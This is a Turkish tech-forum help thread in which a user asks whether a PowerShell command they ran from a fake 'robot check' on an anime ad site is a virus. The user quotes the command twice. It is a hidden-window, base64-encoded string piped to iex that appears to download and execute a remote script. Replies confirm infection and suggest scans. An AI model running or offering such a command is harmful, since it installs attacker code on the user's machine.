Bu komut virüs müdür?

Imagishi

Decapat
Daha fazla  
Merhaba, anime izleyecektim reklam sitesine inandım yanlışlıkla panoya bir şey kopyaladı robot checki için Windows r yazıp çalıştırmamı istedi dalgınlıkla yaptım sorun çıkar mı? Komut bu:

Kod:
PowerShell -w h "[Text.Encoding]:utf8.getstring([Convert]:frombaSE64STRIng('awv4ıchpd3ıgj2h0dhbzoi8vynvjaznyzc5vc3mTY24TAG9uz2tvbmcuywxpexvuy3mUY29TL2Rpci9mvmroyk5uVC50EHQNıc1vc2vcyxnpy1bhcnnpbmcplknvbnrlbnq=')) | iex"

Evet, eğer dediği işlemleri yaptıysanız cihazınızda bir zararlı var şu an. Açtığım rehbere bakabilirsiniz.

Merhaba, anime izleyecektim reklam sitesine inandım yanlışlıkla panoya bir şey kopyaladı robot checki için Windows r yazıp çalıştırmamı istedi dalgınlıkla yaptım sorun çıkar mı? Komut bu:

Kod:
PowerShell -w h "[Text.Encoding]:utf8.getstring([Convert]:frombaSE64STRIng('awv4ıchpd3ıgj2h0dhbzoi8vynvjaznyzc5vc3mTY24TAG9uz2tvbmcuywxpexvuy3mUY29TL2Rpci9mvmroyk5uVC50EHQNıc1vc2vcyxnpy1bhcnnpbmcplknvbnrlbnq=')) | iex"

Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.

Allah Rahmet Eylesin (!)

PC'de bir sıkıntı var mı şu anlık antivirüs ile taratın büyük ihtimal bulamaz ama denemeye değer.
birazdan bakacağım

Evet, eğer dediği işlemleri yaptıysanız cihazınızda bir zararlı var şu an. Açtığım rehbere bakabilirsiniz.

Rehberi pek anlayamadım demek istediğiniz şey sadece virüs taraması yapmakmı

Malwarebytes sonuçları sıkıntısız. Ne yapayim başka ?

Son düzenleme:

Technopat Haberler

Yeni konular

Yeni mesajlar

Geri
Yukarı